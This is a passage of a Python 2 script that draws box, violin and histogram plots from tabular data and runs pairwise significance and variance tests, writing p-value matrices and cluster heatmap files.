if plotItemLegend:
ax2=subplot(122)
ax=subplot(121)
else:
ax=gca()
prevHoldState=ishold()
hold(True)
if outliers:
fliers="b+"
else:
fliers=""
whisValue=0.0
if whisker:
whisValue=1.5
for axhlin in axhlines:
#print axhlin
linw=1
try:
linw=float(axhlin[3])
except:
pass
axhline(float(axhlin[0]),linestyle=axhlin[1],color=axhlin[2],linewidth=linw)
if len(dividePlots)>0: #make divided matrices
dataDP=divideDataPerCols(data,dividePlots)
##for i in range(0,len(data)):
## print >> stderr,len(data[i])
if showBox:
if len(dividePlots)==0:
boxplotted=ax.boxplot(data,notch,widths=0.5,sym=fliers,whis=whisValue)
#setp(boxplotted["boxes"],color="blue")
whiskerlines=boxplotted["whiskers"]
for w in whiskerlines:
w.set_linestyle(whiskerStyle)
else:
for datdp in dataDP:
boxplotted=ax.boxplot(datdp,notch,widths=0.5,sym=fliers,whis=whisValue)
#setp(boxplotted["boxes"],color="blue")
whiskerlines=boxplotted["whiskers"]
for w in whiskerlines:
w.set_linestyle(whiskerStyle)
#w.set_linewidth(5)
#print >> stderr,resultD
maxMax=-10000000.0
minMin=10000000.0
violinw=min(0.15*max(len(data)-1,1.0),0.5)
if trendData:
#print >> stderr,"plot"
for trendDataStartIdx,trendDataForThisStartIdx in trendData.items():
#print >> stderr,"plot",len(trendDataForThisStartIdx)
trendcurves=[]
legendlabels=[]
if annot:
annotForThisStartIdx=annot[trendDataStartIdx]
for i in range(0,len(trendDataForThisStartIdx)):
trendDataPerItem=trendDataForThisStartIdx[i]
if annot:
annotThisItem=annotForThisStartIdx[i]
if trendDataPerItem:
#print >> stderr,"plot"
thisTrend=ax.plot(range(trendDataStartIdx+1,trendDataStartIdx+len(trendDataPerItem)+1),trendDataPerItem,"-")
if annot and plotItemLegend:
trendcurves.append(thisTrend)
legendlabels.append(annotThisItem)
for i in range(0,len(data)):
curCol=data[i]
# datasorted=data[:]
# datasorted.sort()
# numData=len(datasorted)
# HQn=numData*3/4
# LQn=numData*1/4
# maxMax=max(maxMax,datasorted[HQn]*1.5)
# minMin=min(minMax,datasorted[LQn]*1.5)
maxMax=max(maxMax,max(curCol))
minMin=min(minMin,min(curCol))
if showMean:
ax.plot([i+0.75,i+1.25],[mean(curCol)]*2,markMean)
if showViolin:
if len(dividePlots)==0:
kernel=gaussian_kde(curCol)
kernel_min=kernel.dataset.min()
kernel_max=kernel.dataset.max()
violinx=arange(kernel_min,kernel_max,(kernel_max-kernel_min)/100.)
violinv=kernel.evaluate(violinx)
violinv=violinv/violinv.max()*violinw
fill_betweenx(violinx,i+1,violinv+i+1,facecolor=vfacecolor,alpha=valpha) #'y', 0.3
fill_betweenx(violinx,i+1,-violinv+i+1,facecolor=vfacecolor,alpha=valpha)
else:
for j in range(0,len(dataDP)):
curcoldp=dataDP[j][i]
if len(curcoldp)<2:
continue
kernel=gaussian_kde(curcoldp)
kernel_min=kernel.dataset.min()
kernel_max=kernel.dataset.max()
violinx=arange(kernel_min,kernel_max,(kernel_max-kernel_min)/100.)
violinv=kernel.evaluate(violinx)
violinv=violinv/violinv.max()*violinw
fill_betweenx(violinx,i+1,violinv+i+1,facecolor=vfacecolor,alpha=valpha) #'y', 0.3
fill_betweenx(violinx,i+1,-violinv+i+1,facecolor=vfacecolor,alpha=valpha)
if showIndPoints:
plot([i+1]*len(curCol),curCol,mark)
if showSampleSizes:
if len(dividePlots)==0:
for i in range(0,len(data)):
curCol=data[i]
text(i+1,maxMax*1.05,str(len(curCol)),horizontalalignment='center',verticalalignment='center',color='red')
else:
for i in range(0,len(data)):
thisL=[]
for j in range(0,len(dataDP)):
thisL.append(len(dataDP[j][i]))
sumL=sum(thisL)
text(i+1,maxMax*1.05,"+".join([str(x) for x in thisL])+"="+str(sumL),horizontalalignment='center',verticalalignment='center',color='red')
xticks( range(1,len(data)+1), xtickLabels , rotation=xlegendrotation)
if makeBinMatrix:
binMatrixOutFilename,binMatrixNumBins=makeBinMatrix
outputBinFiles(binMatrixOutFilename,data,xtickLabels,minMin,maxMax,binMatrixNumBins)
if makePzfxFile:
pzfxTemplateFile,outFile,tableRefID=makePzfxFile
#prepare data format
PzfxData=[]
for xtickLabel,dataCol in zip(xtickLabels,data):
PzfxData.append( [xtickLabel, dataCol ] )
writePzfxTableFile(outFile,pzfxTemplateFile,tableRefID,titl,80,3,PzfxData)
xlabel(xlabe)
ylabel(ylabe)
title(titl)
if ylims:
ylim([ylims[0],ylims[1]])
else:
ylim([minMin-maxMax*0.1,maxMax*1.1])
if plotItemLegend:
box=ax.get_position()
#gcf().set_figwidth(gcf().get_figwidth()*2)
#ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])
#subplots_adjust(top=0.8,bottom=0.1,left=0,right=0.8)
#box2=ax2.get_position()
#ax2.set_position([box2.x0,box2.y0, box.width * 0.1,box.height])
subplots_adjust(top=0.8, bottom=0.1, left=0, right=0.8)
leg=ax.legend(trendcurves,legendlabels,bbox_to_anchor=(1,0),loc="center left")
#leg = gcf().get_legend()
ltext = leg.get_texts()
plt.setp(ltext, fontsize=10)
hold(prevHoldState)
def findIndices(needles,haystack):
indices=[]
for needle in needles:
indices.append(haystack.index(needle))
return indices
def rearrangeColAndRowSqMatrix(M,from_indices):
newM=[]
lenM=len(M)
for r in range(0,lenM):
newRow=[]
newM.append(newRow)
for c in range(0,lenM):
newRow.append(M[from_indices[r]][from_indices[c]])
return newM
def printMatrix(stream,M,prefixes):
for row,prefix in zip(M,prefixes):
for cell in row:
print >> stream,"%g\t" % (cell),
print >> stream,prefix
#use pvalue as a distance metric
#dist=1-pvalues
#fake the record for PyCluster
def makePValueClusterPlot(jobname,sampleNames,pvaluesM,methodCluster):
#fake a record
record=Record()
#fake M
M=[]
Mr=[]
M.append(Mr)
for sample in sampleNames:
Mr.append(0)
record.data=numpy.array(M)
record.mask=None
record.geneid=["Dummy"]
record.genename=["Dummy"]
record.expid=sampleNames
record.uniqid="GENENAME"
#now do something serious
distM=[]
for pvalueRows in pvaluesM:
distRow=[]
distM.append(distRow)
for pvalue in pvalueRows:
distRow.append(1.0-pvalue)
#now cluster
Tree=treecluster(distancematrix=distM,method=methodCluster)
record.save(jobname,expclusters=Tree)
#now hijack the result file and change it to pvalue heatmap
fil=open(jobname+".cdt")
firstthreelines=[]
lino=0
for lin in fil:
lino+=1
if lino>3:
break
lin=lin.rstrip()
firstthreelines.append(lin)
if lino==1:
fields=lin.split("\t")
arrayOrdered=fields[3:]
fil.close()
fil=open(jobname+".cdt","w")
for lin in firstthreelines:
print >> fil, lin
rearrangedCorrMatrix=rearrangeColAndRowSqMatrix(pvaluesM,findIndices(arrayOrdered,sampleNames))
for i in range(0,len(arrayOrdered)):
print >> fil, arrayOrdered[i]+"\t"+arrayOrdered[i]+"\t"+"1.000000",
for j in range(0,len(arrayOrdered)):
print >> fil,"\t"+str(rearrangedCorrMatrix[i][j]),
print >> fil,""
fil.close()
fil=open(jobname+".mat","w")
print >> fil, "Correlation Matrix (Not Clustered)"
print >> fil,"\t".join(sampleNames)
printMatrix(fil, pvaluesM, sampleNames)
print >> fil, "Correlation Matrix (Clustered)"
print >> fil,"\t".join(arrayOrdered)
printMatrix(fil, rearrangedCorrMatrix, arrayOrdered)
fil.close()
def makePValueRawPlot(jobname,sampleNames,pvaluesM):
#fake a record
record=Record()
#fake M
M=[]
Mr=[]
M.append(Mr)
for sample in sampleNames:
Mr.append(0)
record.data=numpy.array(M)
record.mask=None
record.geneid=["Dummy"]
record.genename=["Dummy"]
record.expid=sampleNames
record.uniqid="GENENAME"
#now do something serious
record.save(jobname)
#now hijack the result file and change it to pvalue heatmap
fil=open(jobname+".cdt")
firstthreelines=[]
lino=0
for lin in fil:
lino+=1
if lino>2:
break
lin=lin.rstrip()
firstthreelines.append(lin)
if lino==1:
fields=lin.split("\t")
arrayOrdered=fields[3:]
fil.close()
fil=open(jobname+".cdt","w")
for lin in firstthreelines:
print >> fil, lin
rearrangedCorrMatrix=pvaluesM
for i in range(0,len(arrayOrdered)):
print >> fil, arrayOrdered[i]+"\t"+arrayOrdered[i]+"\t"+"1.000000",
for j in range(0,len(arrayOrdered)):
print >> fil,"\t"+str(rearrangedCorrMatrix[i][j]),
print >> fil,""
fil.close()
def trimData(plotData,size):
for plotDataVector in plotData:
shuffle(plotDataVector)
del plotDataVector[size:len(plotDataVector)]
def drawHistogram(outfilename,plotData,xtickLabels,nbins=50):
fig=figure(figsize=(8,len(plotData)*2))
fig.subplots_adjust(top=0.8, bottom=0.1, left=0.2, right=0.8)
#find minmin and maxmax for plotData
minmin=min(plotData[0])
maxmax=max(plotData[0])
for i in range(1,len(plotData)):
minmin=min(minmin,min(plotData[i]))
maxmax=max(maxmax,max(plotData[i]))
rangedata=maxmax-minmin
#maxmax+=rangedata/float(nbin)
#minmin-=rangedata/float(nbin)
maxy=0
axes=[]
for i,D,label in zip(range(0,len(plotData)),plotData,xtickLabels):
ax = fig.add_subplot(len(plotData),1,i+1) #len(plotData),1,i #i+1 in place of i (6/18/2012)
__n,__bins,__patches=ax.hist(D,nbins,(minmin,maxmax),True,histtype="stepfilled")
#ax.plot(__bins,__n,'r-')
maxy=max(maxy,max(__n))
ax.set_title(label)
density = gaussian_kde(D)
xs = np.linspace(minmin,maxmax,200)
density.covariance_factor = lambda : .25
density._compute_covariance()
ax.plot(xs,density(xs))
#ax.set_xlim(minmin,maxmax)
#ax.set_ylim(0,maxy)
axes.append(ax)
#fig.show()
for ax in axes:
ax.set_ylim(0,maxy*1.1)
fig.savefig(outfilename,bbox_inches="tight")
def drawDensigram(outfilename,plotData,xtickLabels,nbins=50):
fig=figure(figsize=(8,len(plotData)*2))
fig.subplots_adjust(top=0.8, bottom=0.1, left=0.2, right=0.8)
#find minmin and maxmax for plotData
minmin=min(plotData[0])
maxmax=max(plotData[0])
for i in range(1,len(plotData)):
minmin=min(minmin,min(plotData[i]))
maxmax=max(maxmax,max(plotData[i]))
rangedata=maxmax-minmin
#maxmax+=rangedata/float(nbin)
#minmin-=rangedata/float(nbin)
maxy=0
axes=[]
for i,D,label in zip(range(0,len(plotData)),plotData,xtickLabels):
ax = fig.add_subplot(len(plotData),1,i+1) #len(plotData),1,i #i+1 in place of i (6/18/2012)
ax.set_title(label)
density = gaussian_kde(D)
xs = np.linspace(minmin,maxmax,200)
density.covariance_factor = lambda : .25
density._compute_covariance()
ax.plot(xs,density(xs))
axes.append(ax)
fig.savefig(outfilename,bbox_inches="tight")
def outputBinFiles(outfilename,plotData,xtickLabels,minMin,maxMax,nbins=50):
histoArrays=[]
_low_range=-100
_binsize=-100
_extrapoints=-1
for col,xtickLabel in zip(plotData,xtickLabels):
histoArray,low_range,binsize,extrapoints=histogram(col,numbins=nbins,defaultlimits=(minMin,maxMax))
histoArrays.append(histoArray)
if _binsize==-100:
_binsize=binsize
_low_range=low_range
else:
if _binsize!=binsize or low_range!=_low_range:
print >> stderr,"inconsistent histo",_binsize,_low_range,histoArray,low_range,binsize,extrapoints
exit(1)
if extrapoints>0:
print >> stderr,"extrapoints>0",histoArray,low_range,binsize,extrapoints
exit(1)
binLows=[]
for i in range(0,nbins):
binLows.append(i*binsize)
outfil=open(outfilename,"w")
outv=["bins"]
for binLow in binLows:
outv.append(str(binLow))
print >> outfil,"\t".join(outv)
#now the data
for xtickLabel,histoArray in zip(xtickLabels,histoArrays):
outv=[xtickLabel]
totalPoint=sum(histoArray)
for v in histoArray:
outv.append(str(float(v)/totalPoint))
print >> outfil,"\t".join(outv)
outfil.close()
def filterDataInRangeInclusive(D,mi,ma):
xd=[]
N=0
NIN=0
NBelow=0
NAbove=0
for d in D:
N+=1
if mi!=None and d<mi:
NBelow+=1
continue
if ma!=None and d>ma:
NAbove+=1
continue
xd.append(d)
NIN+=1
return xd,N,NIN,NBelow,NAbove
def writeXYZPvalues(filename,xtickLabels,pvalueM):
fil=open(filename,"w")
for x in range(0,len(xtickLabels)):
for y in range(0,len(xtickLabels)):
print >> fil,xtickLabels[x]+"\t"+str(xtickLabels[y])+"\t"+str(pvalueM[x][y])
fil.close()
def mean2(X):
return float(sum(X))/len(X)
def plotExpBox_Main(inputFiles,headers,valcols,outputFile,sep,startRow,showIndPoints,mark,markMean,showMean,notch,whisker,outliers,plotPvalueCluster,outputClusterPrefix,methodCluster,xlegendrotation,xlabe,ylabe,figsz,titl,showSampleSizes,trimToMinSize,relabels,logb,plotHistogramToFile,plotMedianForGroups,botta,showViolin,showBox,firstColAnnot,plotTrend,showLegend,makePzfxFile,makeBinMatrix,writeDataSummaryStat,summaryStatRange,minuslog10pvalue,minNDataToKeep,vfacecolor,valpha,outXYZPvalues,dividePlots):
#if plotPvalueCluster:
#if pvalue cluster is needed:
# from Bio.Cluster.cluster import *
# from Bio.Cluster import *
#endif
#the real deal!
plotData=[]
xtickLabels=[]
trendData={}
annot={}
minSize=-1
for inputFile,header,cols in zip(inputFiles,headers,valcols):
fin=generic_istream(inputFile)
startIdx=len(plotData)
if firstColAnnot:
colAnnot=cols[0]
cols=cols[1:]
annotThisFile=[]
annot[startIdx]=annotThisFile
else:
colAnnot=-1
annotThisFile=None
for col in cols:
plotData.append([])
xtickLabels.append(header[col])
colIndices=range(startIdx,startIdx+len(cols))
if plotTrend:
#print >> stderr,"plotTrend"
trendDataThisFile=[]
trendData[startIdx]=trendDataThisFile
else:
trendDataThisFile=None
lino=0
for lin in fin:
lino+=1
if lino<startRow:
continue
fields=lin.rstrip("\r\n").split(sep)
if plotTrend:
#print >> stderr,"a"
trendDataThisLine=[]
else:
trendDataThisLine=None
allDataOKThisLine=True
if colAnnot>=0:
annotThisFile.append(fields[colAnnot])
for idx,col in zip(colIndices,cols):
try:
value=float(fields[col])
if logb!=0:
if value==0.0:
raise ValueError
value=log(value)/logb
plotData[idx].append(value)
if plotTrend:
trendDataThisLine.append(value)
#print >> stderr,"value:",value
except:
allDataOKThisLine=False
if plotTrend:
if allDataOKThisLine:
trendDataThisFile.append(trendDataThisLine)
else:
trendDataThisFile.append(None)
fin.close()
if minSize==-1:
minSize=len(plotData[idx]) #or startIDX?
else:
minSize=min([minSize,len(plotData[idx])])
if trimToMinSize:
print >> stderr,"trimming to min size =",minSize
trimData(plotData,minSize)
if len(relabels)>0:
#if len(relabels)!=len(xtickLabels):
# print >> stderr,"relabels doesn't have the same length as original label vectors",xtickLabels,"=>",relabels
# exit()
print >> stderr,xtickLabels
print >> stderr,relabels
for i,relabel in zip(range(0,len(relabels)),relabels):
xtickLabels[i]=relabel
for i in range(0,len(plotMedianForGroups)):
plotMedianForGroups[i]=getCol0ListFromCol1ListStringAdv(xtickLabels,plotMedianForGroups[i])
#drawing medians:
medianToDraw=[]
for mediangrouper in plotMedianForGroups:
curD=[]
for c in mediangrouper:
curD.extend(plotData[c])
medianToDraw.append(median(curD))
for c in range(len(plotData)-1,-1,-1):
if len(plotData[c])<minNDataToKeep:
print >> stderr,xtickLabels[c],"discarded because has only",len(plotData[c]),"data points <",minNDataToKeep
del plotData[c]
del xtickLabels[c]
if not skipStat:
print >> stdout,"student t-test (1 sample; mean=0)"
print >> stdout,"sample","mean","p-val","median"
if writeDataSummaryStat:
fDSS=open(writeDataSummaryStat,"w")
print >> fDSS,"sample\tmean\tvar\tsd\tmin\tmax\tN\tNInRange["+str(summaryStatRange[0])+","+str(summaryStatRange[1])+"]\t%NInRange\tNbelowRange\t%Nbelow\tNAboveRange\t%NAbove"
for x in range(0,len(plotData)):
#print >> stderr, len(plotData[x])
try:
print >> stdout, xtickLabels[x],mean(plotData[x]),ttest_1samp(plotData[x],0)[1],median(plotData[x])
except:
print >> stdout, xtickLabels[x],mean(plotData[x]),"NA",median(plotData[x])
if writeDataSummaryStat:
sumData,N,NIN,NBelow,NAbove=filterDataInRangeInclusive(plotData[x],summaryStatRange[0],summaryStatRange[1])
if NIN>1:
#print >> stderr,"sumData=",sumData
#print >> stderr,mean
mea=mean2(sumData)
DDOF=1
sd=std(sumData,ddof=DDOF)
var=sd*sd
mi=min(sumData)
ma=max(sumData)
else:
mea="NA"
sd="NA"
var="NA"
mi="NA"
ma="NA"
print >> fDSS,xtickLabels[x]+"\t"+str(mea)+"\t"+str(var)+"\t"+str(sd)+"\t"+str(mi)+"\t"+str(ma)+"\t"+str(N)+"\t"+str(NIN)+"\t"+str(float(NIN)*100/N)+"\t"+str(NBelow)+"\t"+str(float(NBelow)*100/N)+"\t"+str(NAbove)+"\t"+str(float(NAbove)*100/N)
pvalueM=[]
if writeDataSummaryStat:
fDSS.close()
print >> stdout,""
print >> stdout,"student t-test (2 samples)"
print >> stdout,"p-val",
for x in range(0,len(plotData)):
print >> stdout,xtickLabels[x],
print >> stdout,""
for x in range(0,len(plotData)):
pvalueRow=[]
pvalueM.append(pvalueRow)
print >> stdout, xtickLabels[x],
for y in range(0,len(plotData)):
if y<=x:
print >> stdout, "",
if x==y:
if minuslog10pvalue:
pvalueRow.append(0.0)
else:
pvalueRow.append(1.0)
else:
pvalueRow.append(pvalueM[y][x])
else:
try:
pvalue=ttest_ind(plotData[x],plotData[y])[1]
except:
pvalue=1.0
if minuslog10pvalue and str(pvalue)!="NA":
try:
pvalue=-1*log(pvalue,10)
except:
pvalue=-1000.0
print >> stdout, str(pvalue),
pvalueRow.append(pvalue)
print >> stdout,"";
print >> stdout,""
if plotPvalueCluster:
makePValueRawPlot(outputClusterPrefix+"_t_raw",xtickLabels,pvalueM)
makePValueClusterPlot(outputClusterPrefix+"_t",xtickLabels,pvalueM,methodCluster)
pvalueM=[]
print >> stdout,"welch t-test"
print >> stdout,"p-val",
for x in range(0,len(plotData)):
print >> stdout,xtickLabels[x],
print >> stdout,""
for x in range(0,len(plotData)):
pvalueRow=[]
pvalueM.append(pvalueRow)
print >> stdout, xtickLabels[x],
for y in range(0,len(plotData)):
if y<=x:
print >> stdout, "",
if x==y:
if minuslog10pvalue:
pvalueRow.append(0.0)
else:
pvalueRow.append(1.0)
else:
pvalueRow.append(pvalueM[y][x])
else:
try:
pvalue=welchs_approximate_ttest_arr(plotData[x],plotData[y])[3]
except:
pvalue=1.0
if minuslog10pvalue and str(pvalue)!="NA":
try:
pvalue=-1*log(pvalue,10)
except:
pvalue=-1000.0
print >> stdout, str(pvalue),
pvalueRow.append(pvalue)
print >> stdout,"";
if outXYZPvalues:
writeXYZPvalues(outXYZPvalues+"_Welch.xyz",xtickLabels,pvalueM)
if plotPvalueCluster:
makePValueRawPlot(outputClusterPrefix+"_Welch_raw",xtickLabels,pvalueM)
makePValueClusterPlot(outputClusterPrefix+"_Welch",xtickLabels,pvalueM,methodCluster)
print >> stdout,""
print >> stdout,"non-parametric (Mann-Whitney U)" #"non-parametric (Mann-Whitney U if larger n<=20 else Wilcoxon)"
print >> stdout,"p-val",
for x in range(0,len(plotData)):
print >> stdout,xtickLabels[x],
pvalueM=[]
print >> stdout,""
for x in range(0,len(plotData)):
pvalueRow=[]
pvalueM.append(pvalueRow)
print >> stdout, xtickLabels[x],
for y in range(0,len(plotData)):
if y<=x:
print >> stdout, "",
if x==y:
if minuslog10pvalue:
pvalueRow.append(0.0)
else:
pvalueRow.append(1.0)
else:
pvalueRow.append(pvalueM[y][x])
else:
#if max(len(plotData[x]),len(plotData[y]))<=20:
try:
pvalue=mannwhitneyu(plotData[x],plotData[y])[1]*2
except:
pvalue=1.0
if minuslog10pvalue and str(pvalue)!="NA":
try:
pvalue=-1*log(pvalue,10)
except:
pvalue=-1000.0
print >> stdout,pvalue, #mann-whiteney need to mul by 2 (one tail to two tail)
pvalueRow.append(pvalue)
#else:
# print >> stdout,wilcoxon(plotData[x],plotData[y])[1], # this is two-tailed already stdout, "", #
print >> stdout,"";
if outXYZPvalues:
writeXYZPvalues(outXYZPvalues+"_U.xyz",xtickLabels,pvalueM)
if plotPvalueCluster:
makePValueRawPlot(outputClusterPrefix+"_U_raw",xtickLabels,pvalueM)
makePValueClusterPlot(outputClusterPrefix+"_U",xtickLabels,pvalueM,methodCluster)
#####now the variance tests
print >> stdout,""
print >> stdout,"Ansari-Bradley Two-sample Test for difference in scale parameters "
print >> stdout,"p-val",
for x in range(0,len(plotData)):
print >> stdout,xtickLabels[x],
pvalueM=[]
print >> stdout,""
for x in range(0,len(plotData)):
pvalueRow=[]
pvalueM.append(pvalueRow)
print >> stdout, xtickLabels[x],
for y in range(0,len(plotData)):
if y<=x:
print >> stdout, "",
if x==y:
if minuslog10pvalue:
pvalueRow.append(0.0)
else:
pvalueRow.append(1.0)
else:
pvalueRow.append(pvalueM[y][x])
else:
#if max(len(plotData[x]),len(plotData[y]))<=20:
try:
pvalue=ansari(plotData[x],plotData[y])[1]
except:
pvalue="NA"
if minuslog10pvalue and str(pvalue)!="NA":
try:
pvalue=-1*log(pvalue,10)
except:
pvalue=-1000.0
#pvalue=1.0
print >> stdout,pvalue,
pvalueRow.append(pvalue)
#else:
# print >> stdout,wilcoxon(plotData[x],plotData[y])[1], # this is two-tailed already stdout, "", #
print >> stdout,"";
if plotPvalueCluster:
makePValueRawPlot(outputClusterPrefix+"_Ansari_raw",xtickLabels,pvalueM)
makePValueClusterPlot(outputClusterPrefix+"_Ansari",xtickLabels,pvalueM,methodCluster)
#####
#####now the variance tests
print >> stdout,""
print >> stdout,"Fligner's Two-sample Test for equal variance (non-parametrics)"
print >> stdout,"p-val",
for x in range(0,len(plotData)):
print >> stdout,xtickLabels[x],
pvalueM=[]
print >> stdout,""
for x in range(0,len(plotData)):
pvalueRow=[]
pvalueM.append(pvalueRow)
print >> stdout, xtickLabels[x],
for y in range(0,len(plotData)):
if y<=x:
print >> stdout, "",
if x==y:
if minuslog10pvalue:
pvalueRow.append(0.0)
else:
pvalueRow.append(1.0)
else:
pvalueRow.append(pvalueM[y][x])
else:
#if max(len(plotData[x]),len(plotData[y]))<=20:
try:
pvalue=fligner(plotData[x],plotData[y])[1]
except:
pvalue="NA"
#pvalue=1.0
if minuslog10pvalue and str(pvalue)!="NA":
try:
pvalue=-1*log(pvalue,10)
except:
pvalue=-1000.0
print >> stdout,pvalue,
pvalueRow.append(pvalue)
#else:
# print >> stdout,wilcoxon(plotData[x],plotData[y])[1], # this is two-tailed already stdout, "", #
print >> stdout,"";
if plotPvalueCluster:
makePValueRawPlot(outputClusterPrefix+"_fligner_raw",xtickLabels,pvalueM)
makePValueClusterPlot(outputClusterPrefix+"_fligner",xtickLabels,pvalueM,methodCluster)
#####
#####now the variance tests
print >> stdout,""
print >> stdout,"Levene's Two-sample Test for equal variance"
print >> stdout,"p-val",
for x in range(0,len(plotData)):
print >> stdout,xtickLabels[x],
pvalueM=[]
print >> stdout,""
for x in range(0,len(plotData)):
pvalueRow=[]
pvalueM.append(pvalueRow)
print >> stdout, xtickLabels[x],
for y in range(0,len(plotData)):
if y<=x:
print >> stdout, "",
if x==y:
if minuslog10pvalue:
pvalueRow.append(0.0)
else:
pvalueRow.append(1.0)
else:
pvalueRow.append(pvalueM[y][x])
else:
#if max(len(plotData[x]),len(plotData[y]))<=20:
try:
pvalue=levene(plotData[x],plotData[y])[1]
except:
pvalue="NA"
#pvalue=1.0
if minuslog10pvalue and str(pvalue)!="NA":
try:
pvalue=-1*log(pvalue,10)
except:
pvalue=-1000.0
print >> stdout,pvalue,
pvalueRow.append(pvalue)
#else:
# print >> stdout,wilcoxon(plotData[x],plotData[y])[1], # this is two-tailed already stdout, "", #
print >> stdout,"";
if plotPvalueCluster:
makePValueRawPlot(outputClusterPrefix+"_levene_raw",xtickLabels,pvalueM)
makePValueClusterPlot(outputClusterPrefix+"_levene",xtickLabels,pvalueM,methodCluster)
#####
#####now the variance tests
print >> stdout,""
print >> stdout,"Bartlett's Two-sample Test for equal variance (for normal distributions)"
print >> stdout,"p-val",
for x in range(0,len(plotData)):
print >> stdout,xtickLabels[x],
pvalueM=[]
print >> stdout,""
for x in range(0,len(plotData)):
pvalueRow=[]
pvalueM.append(pvalueRow)
print >> stdout, xtickLabels[x],
for y in range(0,len(plotData)):
if y<=x:
print >> stdout, "",
if x==y:
if minuslog10pvalue:
pvalueRow.append(0.0)
else:
pvalueRow.append(1.0)
else:
pvalueRow.append(pvalueM[y][x])
else:
#if max(len(plotData[x]),len(plotData[y]))<=20:
try:
pvalue=bartlett(plotData[x],plotData[y])[1]
except:
pvalue="NA"
#pvalue=1.0
if minuslog10pvalue and str(pvalue)!="NA":
try:
pvalue=-1*log(pvalue,10)
except:
pvalue=-1000.0
print >> stdout,pvalue,
pvalueRow.append(pvalue)
#else:
# print >> stdout,wilcoxon(plotData[x],plotData[y])[1], # this is two-tailed already stdout, "", #
print >> stdout,"";
if plotPvalueCluster:
makePValueRawPlot(outputClusterPrefix+"_bartlett_raw",xtickLabels,pvalueM)
makePValueClusterPlot(outputClusterPrefix+"_bartlett",xtickLabels,pvalueM,methodCluster)
#####
figure(figsize=figsz)
subplots_adjust(top=0.9, bottom=botta, left=0.2, right=0.8)
if len(titl)==0:
titl=outputFile
plotExpBox(plotData,xtickLabels,showIndPoints,mark,markMean,showMean,notch,whisker,outliers,xlegendrotation,xlabe,ylabe,titl,showSampleSizes,showViolin,showBox,annot,trendData,showLegend,makePzfxFile,makeBinMatrix,dividePlots)
#ylim([0,200])
for m in medianToDraw:
axhline(y=m,linestyle=':',color='gray')
savefig(outputFile,bbox_inches="tight")
if len(plotHistogramToFile)>0:
drawHistogram(plotHistogramToFile,plotData,xtickLabels)
drawDensigram(plotHistogramToFile+".density.png",plotData,xtickLabels)
def mulArray(x,n):
L=[]
for i in range(0,n):
L.append(x)
return L
def usageExit(programName):
print >> stderr,programName,"outputFile [ inputFile1 valCol1 inputFile2 valCol2 ...] "
print >> stderr,"Options:"
print >> stderr,"-t -F -d --fs seperator"
print >> stderr,"-r --headerRow headerRow"
print >> stderr,"-s --startRow startRow"
print >> stderr,"-p --showIndPoints"
print >> stderr,"-m --showMean"
print >> stderr,"-n --notch"
print >> stderr,"--first-col-annot first column of each valCol is annotation"
print >> stderr,"--plot-trend draw trend curves per file"
print >> stderr,"--xtick-rotation degree"
print >> stderr,"--offWhisker"
print >> stderr,"--offOutliers"
print >> stderr,"--hide-violin"
print >> stderr,"--minus-log10-pvalue output pvalue as -log10(pvalue)"
print >> stderr,"--pvalue-cluster-as prefix make pvalue cluster heatmap using 1-pvalue as distance metric"
print >> stderr,"--pvalue-cluster-method method cluster using one of the following method for the pvalue cluster heatmap"
print >> stderr,"--vfacecolor r,g,b,a --valpha a facecolor and alpha for violin plots"
print >> stderr,"--xlabel label"
print >> stderr,"--ylabel label"
print >> stderr,"--figsize w,h"
print >> stderr,"--title title (default is filename)"
print >> stderr,"--show-sample-sizes"
print >> stderr,"--relabel-as label1,label2,label3,... relabel the columns"
print >> stderr,"--plot-hist filename"
print >> stderr,"--plot-median-for-group cols"
print >> stderr,"--log base"
print >> stderr,"--show-legend"
print >> stderr,"--out-pzfx intemplate,outfile"
print >> stderr,"--out-bin-matrix outfile,numbins"
print >> stderr,"--write-data-summary-stat outfile write to outfile a table of mean and stddev etc"
print >> stderr,"--data-summary-stat-range min,max only consider data within the range min and max for doing summary stat table. Use NA to say no bound for each of the bounds"
print >> stderr,"--min-num-data-to-keep. set the minimal number of datapoints per col to keep. [2]"
print >> stderr,"--outXYZPvalues prefix. Write pvalues for statistics in the form of xyz format"
print >> stderr,"--ylims miny,maxy set min and max y to plot"
print >> stderr,"--whisker-style linestyle. set whisker line style, e.g., - for solid line"
print >> stderr,"--axhline y,linestyle,color draw horizontal line"
print >> stderr,"--skip-stat"
print >> stderr,"--divide-plots t1,t2,.. divide plots into subpopulations per column by thresholds t1,t2,...."
print >> stderr, "from PyCluster (see http://www.biopython.org/DIST/docs/api/Bio.Cluster.Record-class.html#treecluster)"
print >> stderr, "method : specifies which linkage method is used:"
print >> stderr, " method=='s': Single pairwise linkage"
print >> stderr, " method=='m': Complete (maximum) pairwise linkage (default)"
print >> stderr, " method=='c': Centroid linkage"
print >> stderr, " method=='a': Average pairwise linkage"
explainColumns(stderr)
sys.exit()
if __name__=='__main__':
programName=argv[0]
optlist,args=getopt(argv[1:],'t:F:d:r:s:pmn',['fs=','headerRow=','startRow=','showIndPoints','showMean','notch','offWhisker','offOutliers','pvalue-cluster-as=','pvalue-cluster-method=','xtick-rotation=','xlabel=','ylabel=','figsize=','title=','show-sample-sizes','trim-to-min-size','relabel-as=','plot-hist=','plot-median-for-group=','log=','bottom=','hide-violin','hide-box','plot-trend','first-col-annot','show-legend','out-pzfx=','pzfx-tableref-id=','out-bin-matrix=','write-data-summary-stat=','data-summary-stat-range=','minus-log10-pvalue','min-num-data-to-keep=','valpha=','vfacecolor=',"outXYZPvalues=",'ylims=','whisker-style=','axhline=','skip-stat','divide-plots='])
headerRow=1
startRow=2
fs="\t"
showIndPoints=False
showMean=False
whisker=True
outliers=True
notch=0
logb=0
plotHistogramToFile=""
plotMedianForGroups=[]
xlegendrotation=0
makePvalueClusters=False
pvalueClusterOutputPrefix=""
pvalueClusterMethod="a"
xlabe="Samples"
ylabe="Values"
titl=""
figsz=(8,6)
showSampleSizes=False
botta=0.3
filenames=[]
valcols=[]
headers=[]
relabels=[]
firstColAnnot=False
plotTrend=False
trimToMinSize=False
showViolin=True
showBox=True
showLegend=False
makePzfxFile=None
makeBinMatrix=None
pzfxTableRefID="Table0"
#if len(args)!=3:
writeDataSummaryStat=""
summaryStatRange=[None,None]
minuslog10pvalue=False
minNDataToKeep=2
vfacecolor='y'
valpha=1.0 #0.3
outXYZPvalues=None
ylims=None
axhlines=[]
whiskerStyle="--"
skipStat=False
dividePlots=[]
#else:
try:
outputFile=args[0]
for a,v in optlist:
if a in ["-F","-t","-d","--fs"]:
fs=replaceSpecialChar(v)
elif a in ["-s","--startRow"]:
